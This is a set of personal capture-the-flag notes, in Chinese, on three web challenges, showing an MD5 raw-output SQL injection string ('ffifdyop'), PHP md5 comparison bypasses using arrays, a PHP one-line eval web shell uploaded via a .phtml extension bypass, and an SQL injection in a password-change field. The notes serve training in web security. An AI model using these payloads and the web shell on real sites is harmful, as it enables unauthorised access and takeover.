note-28

[BJDCTF2020]Easy MD5

在bp查看相应，看到：
hint: select * from ‘admin’ where password=md5($pass,true)
试一下ffifdyop
返回的页面中有：

<!--
$a = $GET['a'];
$b = $_GET['b'];

if($a != $b && md5($a) == md5($b)){
    // wow, glzjin wants a girl friend.
-->

不是怎么都在求girlfriend,
这个我猜能用数组绕过

?a=r[]&b=q[]
//不行
?a='1'&b=1
//no

那直接上网查md5加密后能弱等于的字符

?a=%271%27&&b=1
//ok

返回

<?php
error_reporting(0);
include "flag.php";

highlight_file(__FILE__);

if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){
    echo $flag;
}

这个强不等于试一下’1’,1

param1=1&param2='1'
//no

param1[]=1&param2[]=2
// flag{8277b79d-033f-4f57-a8dd-d74d41893128} 
//原来我刚才用的数组绕过是写错的啊😅
//试了一下，levels91.php和levell14.php，都能直接用数组绕过

ffifdyop

sql中md5的万能密码
https://blog.csdn.net/Jeff_12138/article/details/121847582

[ACTF2020 新生赛]Upload

正常穿了一次图片，显示了上传文件的储存目录

/uplo4d/

上网随便找个php一句话木马

<?php
@eval($_POST['hack']);
?>

先把后最改为png在前端页面上传，或者直接改前端
然后用bp把后缀名改为php上传
提示nono

后把后缀改为 .phtml
成功上传
最后蚁剑连接，在根目录发现flag

phtml 绕过

将文件后缀改为 .phtml，在 Apache 服务器上会被当作 PHP 文件执行。

file.phtml

[HCTF 2018]admin

记录一下心路历程：
一开始以为是sql，然后看到前端代码里提示：

you are not admin 

以为是cookie，把初始的cookie解base64后好像出了个json格式的啥，试着把里面的”1”改为”admin”，
没用。
随后注册了一个账户，想起了数据库污染啥的，但是这题不是
注册账户后登录，然后更改密码，

123'where username=admin#

然后用123来登录admin，拿到flag
没想到一次成了